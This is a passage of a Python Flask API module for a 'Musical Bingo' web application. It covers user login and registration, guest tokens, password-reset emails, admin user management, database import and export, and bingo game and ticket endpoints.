'columns': g.current_options.columns,
}
return retval
class UserApi(MethodView):
"""
API for a user to login, logout, register
"""
decorators = [get_options, jwt_required(optional=True), uses_database]
def post(self) -> Response:
"""
Attempt to log in.
'username' can be either a username or an email address
"""
username = cast(JsonObject, request.json)['username']
password = cast(JsonObject, request.json)['password']
rememberme = request.json.get('rememberme', False) # type: ignore
user = cast(models.User,
models.User.get(cast(DatabaseSession, db_session),
username=username))
if user is None:
user = models.User.get(db_session, email=username)
if user is None:
response = jsonify(
{'error': 'Unknown username or wrong password'})
response.status_code = 401
return response
if not user.check_password(password):
response = jsonify({'error': 'Unknown username or wrong password'})
response.status_code = 401
return response
user.last_login = datetime.datetime.now()
user.reset_expires = None
user.reset_token = None
result = decorate_user_info(user)
session.clear()
result['accessToken'] = create_access_token(identity=user.username)
if isinstance(result['accessToken'], bytes):
result['accessToken'] = str(result['accessToken'], 'utf-8')
expires: Optional[datetime.timedelta] = None
if rememberme:
expires = cast(datetime.timedelta,
current_app.config['REMEMBER_ME_REFRESH_TOKEN_EXPIRES'])
result['refreshToken'] = create_refresh_token(identity=user.username,
expires_delta=expires) # type: ignore
if isinstance(result['refreshToken'], bytes):
result['refreshToken'] = str(result['refreshToken'], 'utf-8')
models.Token.add(decode_token(result['refreshToken']),
current_app.config['JWT_IDENTITY_CLAIM'],
False, db_session)
return jsonify(result)
def put(self) -> Response:
"""
Register a new user
"""
try:
req_json = cast(JsonObject, request.json)
email = req_json['email']
password = req_json['password']
username = req_json['username']
except KeyError as err:
return jsonify({str(err): "Is a required field"}, 400)
if models.User.exists(db_session, username=username):
return jsonify({
'error': {
"username": f'Username {username} is already taken, choose another one',
},
'success': False,
'user': {
'username': username,
'email': email,
}
})
if models.User.exists(db_session, email=email):
return jsonify({
'error': {
"email": f'Email address "{email}" has already been registered',
},
'success': False,
'user': {
'username': username,
'email': email,
}
})
user = models.User(username=username,
password=models.User.hash_password(password),
email=email,
groups_mask=models.Group.USERS.value,
last_login=datetime.datetime.now())
db_session.add(user)
db_session.commit()
# TODO: put expiry information in a setting
expires = datetime.timedelta(days=1)
refresh_token = create_refresh_token(identity=user.username,
expires_delta=expires)
models.Token.add(decode_token(refresh_token),
current_app.config['JWT_IDENTITY_CLAIM'],
False, db_session)
return jsonify({
'message': 'Successfully registered',
'success': True,
'user': decorate_user_info(user),
'accessToken': create_access_token(identity=user.username),
'refreshToken': refresh_token,
})
def get(self) -> Response:
"""
If user is logged in, return the information about the user
"""
username = get_jwt_identity()
if not username:
return jsonify({'error': 'Login required'}, 401)
user = models.User.get(db_session, username=username)
if user is None:
# TODO: revoke access token
response = jsonify({'error': 'Login required'})
response.status_code = 401
return response
return jsonify(decorate_user_info(user))
def delete(self) -> Response:
"""
Log out the current user
"""
username = get_jwt_identity()
user = None
if username:
user = cast(models.User, models.User.get(db_session, username=username))
if user:
access: Optional[models.Token] = None
for token in db_session.query(models.Token).filter_by(user_pk=user.pk, revoked=False):
token.revoked = True
if token.token_type == models.TokenType.ACCESS.value:
access = token
if access is None:
decoded_token = get_jwt()
models.Token.add(decoded_token, current_app.config['JWT_IDENTITY_CLAIM'],
revoked=True, session=db_session)
return jsonify('Logged out')
class CheckUserApi(MethodView):
"""
API to check if a username or email has already been
registered
"""
decorators = [uses_database]
def post(self) -> Response:
"""
check if username or email is already registered
"""
response = {
"username": False,
"email": False
}
username = request.json.get('username', None) # type: ignore
email = request.json.get('email', None) # type: ignore
if not username and not email:
return jsonify_no_content(400)
if username:
response['username'] = models.User.exists(
db_session, username=username)
if email:
response['email'] = models.User.exists(db_session, email=email)
return jsonify(response)
class GuestAccountApi(MethodView):
"""
API to check if a guest token is valid and create
guest accounts
"""
decorators = [get_options, jwt_required(optional=True), uses_database]
def get(self) -> Response:
"""
Get list of tokens
"""
username = get_jwt_identity()
if not username:
return jsonify_no_content(401)
user = cast(models.User, models.User.get(db_session, username=username))
if user is None or not user.is_admin:
return jsonify_no_content(401)
tokens = models.Token.search(db_session, token_type=TokenType.GUEST.value,
revoked=False)
return jsonify([token.to_dict() for token in tokens])
def post(self) -> Response:
"""
check if a guest token is valid
"""
if not request.json:
return jsonify_no_content(400)
jti = request.json.get('token', None)
if not jti:
return jsonify_no_content(400)
token = cast(models.Token, models.Token.get(
db_session, jti=jti, token_type=TokenType.GUEST.value))
result = {
"success": token is not None and not token.revoked
}
return jsonify(result)
def put(self) -> Response:
"""
Create a guest account
"""
if not request.json:
return jsonify_no_content(400)
jti = request.json.get('token', None)
if not jti:
return jsonify_no_content(400)
token = cast(models.Token, models.Token.get(
db_session, jti=jti, token_type=TokenType.GUEST.value))
result: JsonObject = {
"success": token is not None,
}
if token is None:
result["error"] = "Guest token missing"
return jsonify(result)
username: Optional[str] = None
while username is None:
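            # Draw random guestNNN usernames until one is not already taken;
            # the loop re-rolls on collision rather than incrementing.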
guest_id = random.randint(100, 999)
username = f'guest{guest_id}'
user = models.User.get(db_session, username=username)
if user is not None:
username = None
password = secrets.token_urlsafe(14)
user = models.User(username=username,
password=models.User.hash_password(password),
email=username,
groups_mask=models.Group.GUESTS.value,
last_login=datetime.datetime.now())
db_session.add(user)
db_session.commit()
result.update(decorate_user_info(user))
result['accessToken'] = create_access_token(identity=username)
result['password'] = password
expires = current_app.config['GUEST_REFRESH_TOKEN_EXPIRES']
result['refreshToken'] = create_refresh_token(identity=username,
expires_delta=expires)
models.Token.add(decode_token(result['refreshToken']),
current_app.config['JWT_IDENTITY_CLAIM'],
False, db_session)
return jsonify(result)
class CreateGuestTokenApi(MethodView):
"""
Create a guest token
"""
decorators = [jwt_required(), uses_database]
def put(self) -> Response:
"""
Create a guest token
"""
if not current_user.is_admin:
return jsonify_no_content(401)
jti = secrets.token_urlsafe(7)
expires = datetime.datetime.now() + datetime.timedelta(days=7)
token = models.Token(jti=jti,
token_type=TokenType.GUEST.value,
username=jti,
expires=expires,
revoked=False)
db_session.add(token)
return jsonify({"success": True, "token": token.to_dict()})
class DeleteGuestTokenApi(MethodView):
"""
    API to revoke (delete) a guest token
"""
decorators = [jwt_required(optional=True), uses_database]
def delete(self, token: str) -> Response:
"""
Delete a guest token
"""
if not current_user.is_admin:
return jsonify_no_content(401)
db_token = cast(models.Token, models.Token.get(
db_session, jti=token, token_type=TokenType.GUEST.value))
if db_token is None:
return jsonify_no_content(404)
db_token.revoked = True
return jsonify_no_content(204)
class ResetPasswordUserApi(MethodView):
"""
API to allow a user to request a password reset and to
use the password reset link to choose a new password
"""
decorators = [get_options, uses_database]
def post(self) -> Response:
"""
Either request a password reset or confirm a password reset.
"""
if not request.json:
return jsonify_no_content(400)
email = request.json.get('email', None)
if not email:
return jsonify_no_content(400)
user = cast(models.User, models.User.get(db_session, email=email))
if not user:
# we don't divulge if the user really exists
response = {
"email": email,
"success": True,
}
return jsonify(response)
if 'token' in request.json:
return self.check_password_update(user)
return self.create_password_reset_token(user)
def check_password_update(self, user: models.User) -> Response:
"""
Check request to change password.
"""
response = {
"email": user.email,
"debug": "check_password_update",
"success": True,
}
try:
token = cast(JsonObject, request.json)['token']
password = cast(JsonObject, request.json)['password']
confirm = cast(JsonObject, request.json)['confirmPassword']
# TODO: use UTC
now = datetime.datetime.now()
if (password != confirm or
token != user.reset_token or
user.reset_expires < now):
response['error'] = 'Incorrect email address or the password reset link has expired'
response['success'] = False
else:
user.reset_expires = None
user.reset_token = None
user.set_password(password)
db_session.commit()
except KeyError as err:
response['success'] = False
response['error'] = f'Missing field {err}'
return jsonify(response)
def create_password_reset_token(self, user: models.User) -> Response:
"""
Create a random token and email a link using this token to
the registered email address. The email will contain both a
plain text and an HTML version.
"""
response = {
"email": user.email,
"success": True,
}
token_lifetime = current_app.config['PASSWORD_RESET_TOKEN_EXPIRES']
if isinstance(token_lifetime, int):
token_lifetime = datetime.timedelta(seconds=token_lifetime)
user.reset_expires = datetime.datetime.now() + token_lifetime
user.reset_token = secrets.token_urlsafe(16)
# pylint: disable=broad-except
try:
self.send_reset_email(user, token_lifetime)
except Exception as err:
response['error'] = type(err).__name__ + ": " + str(err)
response['success'] = False
return jsonify(response)
def send_reset_email(self, user: models.User, token_lifetime: datetime.timedelta) -> None:
"""
Send an email to the user to allow them to reset their password.
The email will contain both a plain text and an HTML version.
"""
settings = g.current_options.email_settings()
for option in ['server', 'port', 'sender', 'username', 'password']:
if not getattr(settings, option, None):
raise ValueError(f"Invalid SMTP settings: {option} is not set")
reply_to = settings.reply_to
if reply_to is None:
reply_to = settings.sender
context = {
'subject': 'Musical Bingo password reset request',
'time_limit': f'{token_lifetime.days} days',
'url': request.url_root,
'reply_to': reply_to,
'reset_link': urljoin(request.url_root,
url_for('reset_password', path=user.reset_token)),
}
message = MIMEMultipart("alternative")
message["Subject"] = context["subject"]
message["From"] = settings.sender
message["To"] = user.email
part1 = MIMEText(render_template(
'password-reset.txt', **context), "plain")
part2 = MIMEText(render_template(
'password-reset.html', **context), "html")
message.attach(part1)
message.attach(part2)
ssl_context = ssl.create_default_context()
if settings.starttls:
with smtplib.SMTP(settings.server, settings.port) as server:
#server.set_debuglevel(2)
server.ehlo_or_helo_if_needed()
server.starttls(context=ssl_context) # type: ignore
server.ehlo_or_helo_if_needed()
if settings.username:
assert settings.password is not None
server.login(settings.username, settings.password)
server.send_message(message, settings.sender, user.email)
else:
with smtplib.SMTP_SSL(settings.server, settings.port, context=ssl_context) as server:
# server.set_debuglevel(2)
server.ehlo_or_helo_if_needed()
if settings.username:
assert settings.password is not None
server.login(settings.username, settings.password)
server.send_message(message, settings.sender, user.email)
class ModifyUserApi(MethodView):
"""
    API to allow a user to modify their own account
"""
decorators = [jwt_required(), uses_database]
def post(self) -> Response:
"""
Modify the user's own password or email
"""
if not request.json:
return jsonify_no_content(400)
response = {
"email": current_user.email,
"success": True,
}
try:
email = request.json['email']
current_password = request.json['existingPassword']
password = request.json['password']
confirm = request.json['confirmPassword']
if not current_user.check_password(current_password):
response["success"] = False
response["error"] = "Existing password did not match"
elif password != confirm:
response["success"] = False
response["error"] = "New passwords do not match"
else:
current_user.set_password(password)
current_user.email = email
response["email"] = email
db_session.commit()
except KeyError as err:
response['success'] = False
response['error'] = f'Missing field {err}'
return jsonify(response)
class UserManagmentApi(MethodView):
"""
Admin API to view and modify all users
"""
decorators = [jwt_required(), uses_database]
def get(self) -> Response:
"""
Get the list of registered users
"""
if not current_user.is_admin:
            return jsonify_no_content(401)
users = []
for user in models.User.all(db_session):
item = user.to_dict(exclude={'password', 'groups_mask'})
item['groups'] = [g.name.lower() for g in user.groups]
users.append(item)
return jsonify(users)
def post(self) -> Response:
"""
Add, modify or delete users
"""
if not current_user.is_admin:
            return jsonify_no_content(401)
if not request.json:
return jsonify_no_content(400)
result: JsonObject = {
"errors": [],
"added": [],
"modified": [],
"deleted": []
}
for idx, item in enumerate(request.json):
self.modify_user(result, idx, item)
return jsonify(result)
@staticmethod
def modify_user(result: JsonObject, idx: int, item: JsonObject) -> None:
"""
Modify the settings of the specified user
"""
try:
pk = item['pk']
deleted = item['deleted']
username = item['username']
email = item['email']
groups = item['groups']
except KeyError as err:
result["errors"].append(f"{idx}: Missing field {err}")
return
password = item.get('password', None)
if item.get('newUser', False):
user = models.User(email=email, username=username)
user.set_password(password)
user.set_groups(groups)
db_session.add(user)
db_session.flush()
pk = user.pk
result["added"].append({'username': username, 'pk': pk})
return
user = cast(models.User, models.User.get(db_session, pk=pk))
if user is None:
result["errors"].append(f"{idx}: Unknown user {pk}")
return
if deleted:
db_session.delete(user)
result['deleted'].append(pk)
return
modified = False
if username != user.username:
if models.User.exists(db_session, username=username):
result["errors"].append(
f"{idx}: Username {username} already present")
else:
user.username = username
modified = True
if email != user.email:
if models.User.exists(db_session, email=email):
result["errors"].append(
f"{idx}: Email {email} already present")
else:
user.email = email
modified = True
group_mask = user.groups_mask
user.set_groups(groups)
if group_mask != user.groups_mask:
modified = True
if password:
user.set_password(password)
modified = True
if modified:
result['modified'].append(pk)
class RefreshApi(MethodView):
"""
API to request a new access token from a refresh token
"""
decorators = [jwt_required(refresh=True), uses_database]
def post(self):
"""
generate a new access token from a refresh token
"""
username = get_jwt_identity()
        if not models.User.exists(db_session, username=username):
return jsonify_no_content(401)
ret = {
'accessToken': create_access_token(identity=username)
}
return jsonify(ret, 200)
def decorate_game(game: models.Game, with_count: bool = False) -> models.JsonObject:
"""
Convert game into a dictionary and add extra fields
"""
js_game = game.to_dict()
if with_count:
# pylint: disable=no-member
js_game['userCount'] = cast(models.DatabaseSession, db_session).query(
models.BingoTicket).filter(
models.BingoTicket.user == current_user,
models.BingoTicket.game == game).count()
assert g.current_options is not None
opts = game.game_options(cast(Options, g.current_options))
js_game['options'] = opts
palette = Palette.from_string(opts['colour_scheme'])
btk = BingoTicket(palette=palette, columns=opts['columns'])
backgrounds: List[str] = []
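    # Pre-compute the CSS background style of every ticket cell in row-major
    # order so the front end can render tickets without knowing the palette.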
for row in range(opts['rows']):
for col in range(opts['columns']):
backgrounds.append(btk.box_colour_style(col, row).css())
js_game['options']['backgrounds'] = backgrounds
return js_game
class WorkerMultipartResponse:
"""
    Provides a streamed response with the current progress of the
    worker thread.
    This must be used with a multipart/mixed content type: it yields
    an application/json entity at regular intervals containing the
    current progress of the operation.
"""
def __init__(self, worker_type: Type[workers.BackgroundWorker], filename: str,
data: JsonObject):
self.done = False
self.first_response = True
self.result: Optional[workers.DbIoResult] = None
args = (Path(filename), data,)
# pylint: disable=no-member
options = Options(**cast(Options, g.current_options).to_dict())
self.worker = worker_type(args, options, self.import_done)
self.boundary = secrets.token_urlsafe(16).replace('-', '')
self.errors: List[str] = []
def add_error(self, error: str) -> None:
"""
Add an error message
This error will be included in the next progress report
"""
self.errors.append(error)
def generate(self):
"""
Generator that yields the current import progress
"""
if not self.done:
self.worker.start()
min_pct = 1.0
while not self.done and not self.worker.progress.abort:
time.sleep(0.5)
if not self.worker.bg_thread.is_alive():
self.worker.bg_thread.join()
self.worker.finalise(self.worker.result)
self.done = True
continue
progress = {
"errors": self.errors,
"text": self.worker.progress.text,
"pct": self.worker.progress.total_percentage,
"phase": self.worker.progress.current_phase,
"numPhases": self.worker.progress.num_phases,
"done": False,
}
if self.worker.progress.total_percentage <= min_pct and not self.done:
continue
self.errors = []
min_pct = self.worker.progress.total_percentage + 1.0
yield self.create_response(progress)
progress = {
"errors": self.errors,
"text": self.worker.progress.text,
"pct": 100.0,
"phase": self.worker.progress.current_phase,
"numPhases": self.worker.progress.num_phases,
"done": True,
"success": False
}
if self.worker.result:
progress["added"] = self.worker.result.added
progress["keys"] = {}
for table, count in self.worker.result.added.items():
progress["keys"][table] = self.worker.result.pk_maps[table]
if count > 0:
progress["success"] = True
yield self.create_response(progress, True)
def create_response(self, data, last=False):
"""
Create a multipart response
"""
encoded = bytes(json.dumps(data, default=utils.flatten), 'utf-8')
leng = len(encoded)
closed = b'Connection: close\r\n' if last else b''
lines = [
b'',
bytes(f'--{self.boundary}', 'ascii'),
b'Content-Type: application/json',
bytes(f'Content-Length: {leng}', 'ascii'),
closed,
encoded,
]
if self.first_response:
self.first_response = False
lines.pop(0)
if last:
lines.append(bytes(f'--{self.boundary}--\r\n', 'ascii'))
return b'\r\n'.join(lines)
def import_done(self, result: workers.DbIoResult) -> None:
"""
Called when import has completed
"""
self.result = result
self.done = True
class ExportDatabaseGenerator:
"""
    Yields the output of the export process without loading the entire database into memory
"""
def generate(self, opts: JsonObject):
"""
Generator that yields the output of the export process
"""
assert opts is not None
yield b'{\n"Options":'
yield bytes(
json.dumps(opts, indent=' ', default=utils.flatten, sort_keys=True),
'utf-8')
yield b',\n'
tables = [models.User, models.Artist, models.Album, models.Directory,
models.Song, models.Game, models.Track, models.BingoTicket]
for table in tables:
yield bytes(f'"{table.__plural__}":', 'utf-8') # type: ignore
contents = []
with models.db.session_scope() as dbs:
for item in table.all(dbs): # type: ignore
data = item.to_dict(with_collections=True)
contents.append(data) # type: ignore
yield bytes(
json.dumps(contents, indent=' ', default=utils.flatten, sort_keys=True),
'utf-8')
if table != tables[-1]:
yield b','
yield b'\n'
yield b'}\n'
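    # Usage sketch: DatabaseApi.get() below streams this generator straight
    # into a Flask Response, so the full JSON document never has to exist in
    # memory at once:
    #
    #   gen = ExportDatabaseGenerator()
    #   Response(gen.generate(opts), mimetype='application/json; charset=utf-8')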
class DatabaseApi(MethodView):
"""
API for importing and exporting entire database
"""
decorators = [get_options, jwt_required(), uses_database]
def get(self) -> Response:
"""
Export database to a JSON file.
The data is streamed to the client to avoid having to
create the entire database JSON object in memory
"""
gen = ExportDatabaseGenerator()
opts = g.current_options.to_dict(
exclude={'command', 'exists', 'jsonfile', 'database', 'debug',
'game_id', 'title', 'mp3_editor', 'mode', 'smtp',
'secret_key'})
clips = g.current_options.clips()
try:
opts['clip_directory'] = cast(Path, clips).resolve().as_posix()
except AttributeError:
# PurePosixPath and PureWindowsPath don't have the resolve() function
opts['clip_directory'] = clips.as_posix()
return Response(gen.generate(opts),
direct_passthrough=True,
mimetype='application/json; charset=utf-8')
def put(self) -> Response:
"""
Import database
"""
if not request.json:
return jsonify_no_content(400)
if not current_user.is_admin:
return jsonify_no_content(401)
try:
data = request.json['data']
filename = request.json['filename']
except KeyError:
return jsonify_no_content(400)
imp_resp = WorkerMultipartResponse(workers.ImportDatabase, filename, data)
try:
validate_json(JsonSchema.DATABASE, data)
except fastjsonschema.JsonSchemaException as err:
imp_resp.add_error('Not a valid database file')
# pylint: disable=no-member
imp_resp.add_error(err.message)
imp_resp.done = True
return Response(imp_resp.generate(),
direct_passthrough=True,
mimetype=f'multipart/mixed; boundary={imp_resp.boundary}')
class ListDirectoryApi(MethodView):
"""
API for listing all directories
"""
decorators = [get_options, jwt_required(), uses_database]
def get(self) -> Response:
"""
Returns a list of all directories
"""
if not current_user.has_permission(models.Group.CREATORS):
return jsonify_no_content(401)
return jsonify([
mdir.to_dict(with_collections=True) for mdir in models.Directory.all(db_session)
])
class DirectoryDetailsApi(MethodView):
"""
    API for the details of one directory
"""
decorators = [get_directory, get_options, jwt_required(), uses_database]
def get(self, dir_pk: int) -> Response:
"""
Returns details of the specified directory
"""
if not current_user.has_permission(models.Group.CREATORS):
return jsonify_no_content(401)
retval = g.current_directory.to_dict(with_collections=True, exclude={'songs'})
songs = []
for song in g.current_directory.songs:
item = song.to_dict(exclude={'artist', 'album'})
item['artist'] = song.artist.name if song.artist is not None else ''
item['album'] = song.album.name if song.album is not None else ''
songs.append(item)
retval['songs'] = songs
return jsonify(retval)
class ListGamesApi(MethodView):
"""
API for listing all games
"""
decorators = [get_options, jwt_required(), uses_database]
def get(self) -> Response:
"""
Returns a list of all past and upcoming games
"""
now = datetime.datetime.now()
today = now.replace(hour=0, minute=0)
end = now + datetime.timedelta(days=7)
if current_user.is_admin:
games = models.Game.all(db_session).order_by(models.Game.start)
else:
games = db_session.query(models.Game).\
filter(models.Game.start <= end).\
order_by(models.Game.start)
future = []
past = []
for game in games:
if isinstance(game.start, str):
game.start = utils.parse_date(game.start)
if isinstance(game.end, str):
game.end = utils.parse_date(game.end)
js_game = decorate_game(game, with_count=True)
if game.start >= today and game.end > now:
future.append(js_game)
else:
past.append(js_game)
return jsonify({'games': future, 'past': past})
def put(self) -> Response:
"""
Import a game
"""
if not request.json:
return jsonify_no_content(400)
if not current_user.is_admin:
return jsonify_no_content(401)
try:
data = request.json['data']
filename = request.json['filename']
except KeyError:
return jsonify_no_content(400)
imp_resp = WorkerMultipartResponse(workers.ImportGameTracks, filename, data)
try:
validate_json(JsonSchema.GAME_TRACKS, data)
except fastjsonschema.JsonSchemaException as err:
imp_resp.add_error('Not a valid gameTracks file')
# pylint: disable=no-member
imp_resp.add_error(err.message)
imp_resp.done = True
return Response(imp_resp.generate(),
direct_passthrough=True,
mimetype=f'multipart/mixed; boundary={imp_resp.boundary}')
class GameDetailApi(MethodView):
"""
API for extended detail about a game and modification of a game
"""
decorators = [get_game, get_options, jwt_required(), uses_database]
def get(self, game_pk: int) -> Response:
"""
Get the extended detail for a game.
For a game host, this detail will include the complete track listing.
"""
now = datetime.datetime.now()
data = decorate_game(g.current_game)
data['tracks'] = []
if g.current_game.end < now or current_user.has_permission(
models.Group.HOSTS):
for track in g.current_game.tracks: # .order_by(models.Track.number):
trk = {
'artist': '',
'album': '',
'duration': track.song.duration,
'song': track.song.pk,
'title': track.song.title,
}
if track.song.artist is not None:
trk['artist'] = track.song.artist.name
if track.song.album is not None:
trk['album'] = track.song.album.name
trk.update(track.to_dict(only=['pk', 'number', 'start_time']))
data['tracks'].append(trk)
return jsonify(data)
def post(self, game_pk: int) -> Response:
"""
Modify a game
"""
if not current_user.is_admin:
return jsonify_no_content(401)
if not request.json:
return jsonify_no_content(400)
result: JsonObject = {}
try:
start = utils.make_naive_utc(cast(
datetime.datetime,
utils.from_isodatetime(request.json['start'])))
end = utils.make_naive_utc(cast(
datetime.datetime,
utils.from_isodatetime(request.json['end'])))
changes = {
'start': start,
'end': end,
'title': request.json['title'],
}
except (KeyError, ValueError) as err:
result = {
'success': False,
                'error': str(err)
}
return jsonify(result, 400)
if changes['start'] > changes['end']:
result = {
'success': False,
'error': 'Start must be less than end'
}
else:
result = {
'success': True,
}
game = g.current_game
game.set(**changes)
if 'options' in request.json:
opts = game.game_options(g.current_options)
opts.update(request.json['options'])
game.options = opts
# NOTE: deprecated, request should use an 'options' object
if 'colour_scheme' in request.json:
opts = game.game_options(g.current_options)
opts['colour_scheme'] = request.json['colour_scheme']
game.options = opts
result['game'] = decorate_game(game, True)
return jsonify(result)
def delete(self, **kwargs) -> Response:
"""
Delete a game
"""
# TODO: decide which roles are allowed to delete a game
if not current_user.is_admin:
return jsonify_no_content(401)
db_session.delete(g.current_game)
return jsonify_no_content(204)
class ExportGameApi(MethodView):
"""
Export a game to a JSON file
"""
decorators = [get_game, get_options, jwt_required(), uses_database]
def get(self, game_pk: int) -> Response:
"""
Export a game to a JSON file
"""
data = models.export_game_to_object(
g.current_game.id, db_session)
return jsonify(data)
class TicketsApi(MethodView):
"""
API for information about one or more Bingo tickets
"""
decorators = [get_options, get_game, jwt_required(), uses_database]
def get(self, game_pk: int, ticket_pk: Optional[int] = None) -> Response:
"""
get list of tickets for a game or detail for one ticket
"""
if ticket_pk is not None:
return self.get_ticket_detail(ticket_pk)
return self.get_ticket_list()
def get_ticket_list(self) -> Response:
"""
Get the list of Bingo tickets for the specified game.
"""
tickets: List[Dict[str, Any]] = []
if current_user.is_admin:
game_tickets = g.current_game.bingo_tickets.order_by(
models.BingoTicket.number)
else:
game_tickets = g.current_game.bingo_tickets
for ticket in game_tickets:
tck = {
'pk': ticket.pk,
'number': ticket.number,
'game': ticket.game_pk,
'checked': ticket.checked,
}
tck['user'] = ticket.user_pk if ticket.user is not None else None
tickets.append(tck)
return jsonify(tickets)
def get_ticket_detail(self, ticket_pk: int) -> Response:
"""
Get the detailed information for a Bingo Ticket.
"""
ticket = cast(models.BingoTicket, models.BingoTicket.get(
db_session, game=g.current_game, pk=ticket_pk))
if ticket is None:
return jsonify({'error': 'Not found'}, 404)
if ticket.user != current_user and not current_user.has_permission(
models.Group.HOSTS):
response = jsonify({'error': 'Not authorised'})
response.status_code = 401
return response
tracks: List[JsonObject] = []
for track in ticket.get_tracks(db_session):
trk = {
                'artist': track.song.artist.name if track.song.artist is not None else '',
'title': track.song.title
}
tracks.append(trk)
card = ticket.to_dict(exclude={'order', 'tracks', 'fingerprint'})
card['tracks'] = tracks
return jsonify(card)
def put(self, game_pk: int, ticket_pk: Optional[int] = None) -> Response:
"""
claim a ticket for this user
"""
ticket: Optional[models.BingoTicket] = None
if ticket_pk is not None:
ticket = cast(Optional[models.BingoTicket], models.BingoTicket.get(
db_session, game=g.current_game, pk=ticket_pk))
if ticket is None:
return jsonify_no_content(404)
if not ticket.user:
ticket.user = current_user
return jsonify_no_content(201)
if ticket.user != current_user:
# ticket already taken
return jsonify_no_content(406)
return jsonify_no_content(200)
def delete(self, game_pk, ticket_pk=None) -> Response:
"""
release a ticket for this user
"""
ticket: Optional[models.BingoTicket] = None
if ticket_pk is not None:
ticket = cast(Optional[models.BingoTicket], models.BingoTicket.get(
db_session, game=g.current_game, pk=ticket_pk))
if ticket is None:
return jsonify_no_content(404)
if not ticket.user:
return jsonify_no_content(204)
if ticket.user.pk != current_user.pk and not current_user.has_permission(
models.Group.HOSTS):
return jsonify_no_content(401)
ticket.user = None
return jsonify_no_content(204)
class TicketsStatusApi(MethodView):
"""
Get information on which tickets have already been claimed and which
ones are still available.
"""
decorators = [get_game, jwt_required(), uses_database]
def get(self, game_pk: int) -> Response:
"""
Get information on which tickets have already been claimed and which
ones are still available.
"""
claimed: Dict[int, Optional[int]] = {}
for ticket in g.current_game.bingo_tickets:
if ticket.user is not None:
claimed[ticket.pk] = ticket.user.pk
else:
claimed[ticket.pk] = None
return jsonify({"claimed": claimed})
class CheckCellApi(MethodView):
"""
API to set and clear individual cells in a Bingo ticket
"""
decorators = [get_options, get_ticket, get_game, jwt_required(), uses_database]
def put(self, number: int, **kwargs) -> Response:
"""
set the check mark on a ticket.
Only the owner of the ticket or a host can change this.
"""
if number < 0 or number >= (g.current_options.columns * g.current_options.rows):
return jsonify_no_content(404)
g.current_ticket.checked |= (1 << number)
return jsonify_no_content(204)
def delete(self, number: int, **kwargs) -> Response:
"""
clear the check mark on a ticket.
Only the owner of the ticket or a host can change this.
"""
if number < 0 or number >= (g.current_options.columns * g.current_options.rows):
return jsonify_no_content(404)
g.current_ticket.checked &= ~(1 << number)
return jsonify_no_content(204)
class SongApi(MethodView):
"""
API to query songs in the database
"""
decorators = [jwt_required(), uses_database]
def get(self, dir_pk: Optional[int] = None, **kwargs) -> Response:
"""
Search for songs in the database.
If dir_pk is provided, only search within that directory
"""
result: List[JsonObject] = []
db_query = db_session.query(models.Song)
if dir_pk is not None:
db_query = db_query.filter_by(directory_pk=dir_pk)
try:
# if q CGI parameter is provided, it performs a
# case insensitive search of both title and artist
query = request.args['q']
artists = db_session.query(models.Artist.pk).filter(
models.Artist.name.ilike(f"%{query}%"))
db_query = db_query.filter(or_(
models.Song.title.ilike(f"%{query}%"),
models.Song.artist_pk.in_(artists)
))
except KeyError:
pass
for song in db_query:
item = song.to_dict(exclude={'artist', 'album'})
            item['artist'] = song.artist.name if song.artist is not None else ''
            item['album'] = song.album.name if song.album is not None else ''
result.append(item)
return jsonify(result)
class SettingsApi(MethodView):
"""
Admin API to view and modify settings
"""
decorators = [get_options, jwt_required(optional=True), uses_database]
def is_admin(self) -> bool:
"""
Check if a user is logged in, and is an admin
"""
username = get_jwt_identity()
if not username:
return False
user = cast(models.User, models.User.get(db_session, username=username))
if user is None:
return False
return user.is_admin
def get(self) -> Response:
"""
Get the current settings
"""
if not self.is_admin():
result = {
'privacy': self.translate_options(g.current_options.privacy)
}
else:
result = {
'app': self.translate_options(g.current_options),
}
for ext_cls in g.current_options.EXTRA_OPTIONS:
ext_opts = cast(ExtraOptions,
getattr(g.current_options, ext_cls.LONG_PREFIX))
result[ext_cls.LONG_PREFIX] = self.translate_options(ext_opts)
return jsonify(result)
@staticmethod
def translate_options(options: Union[Options, ExtraOptions]) -> List[JsonObject]:
"""
        Convert the specified options into a JSON array using
JavaScript types for each field
"""
opts = options.to_dict()
result: List[JsonObject] = []
for field in options.OPTIONS:
item = {
'help': field.help,
'name': field.name,
'title': field.name.replace('_', ' ').title(),
'value': opts[field.name]
}
# pylint: disable=comparison-with-callable
if field.name == 'mp3_editor':
# TODO: Find a more generic solution
item['choices'] = MP3Factory.available_editors()
item['type'] = 'enum'
elif field.ftype == bool:
item['type'] = 'bool'
elif field.ftype == int:
item['type'] = 'int'
item['minValue'] = field.min_value
item['maxValue'] = field.max_value
elif field.ftype == str:
item['type'] = 'text'
elif field.ftype == json.loads:
item['type'] = 'json'
if item['value'] is not None:
item['value'] = json.dumps(item['value'])
elif isinstance(field.ftype, EnumWrapper):
item['type'] = 'enum'
item['choices'] = field.ftype.names()
item['value'] = item['value'].name
result.append(item)
return result
def post(self) -> Response:
"""
Modify the current settings
"""
if not self.is_admin():
return jsonify_no_content(401)
if not request.json:
return jsonify_no_content(400)
modified_fields: Set[str] = set()
changes: JsonObject = {}
for section, items in request.json.items():
try:
sch = self.process_section_changes(section, items)
if section == 'app':
changes.update(sch)
else:
changes[section] = sch
for field in sch:
modified_fields.add(f'{section}.{field}')
except ValueError as err:
return jsonify({
'success': False,
'error': str(err)
})
g.current_options.update(**changes)
return jsonify({
'success': True,
'changes': sorted(list(modified_fields))
})
def process_section_changes(self, section: str, items: JsonObject) -> JsonObject:
"""
Process the requested changes for the given settings section
"""
changes: JsonObject = {}
opt_map: Dict[str, OptionField] = {}
if section == 'app':
opts: List[OptionField] = Options.OPTIONS
else:
opts = cast(ExtraOptions, getattr(g.current_options, section)).OPTIONS
for field in opts:
opt_map[field.name] = field
for name, value in items.items():
try:
field = opt_map[name]
except KeyError as err:
raise ValueError(f'Invalid field {name}') from err
if field.ftype == int:
if value is None:
raise ValueError(f'Invalid None value for field {name}')
if not isinstance(value, int):
raise ValueError(f'Invalid type {type(value)} for field {name}')
if field.min_value is not None and value < field.min_value:
raise ValueError(
(f'Invalid value {value} for field {name} '+
f'(min={field.min_value})'))
if field.max_value is not None and value > field.max_value:
raise ValueError(
(f'Invalid value {value} for field {name} '+
f'(max={field.max_value})'))
changes[name] = value
return changes
| [
"[email protected]"
] | |
